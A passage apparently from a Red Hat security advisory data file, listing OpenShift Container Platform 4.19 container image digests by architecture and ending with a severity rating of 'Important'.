"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
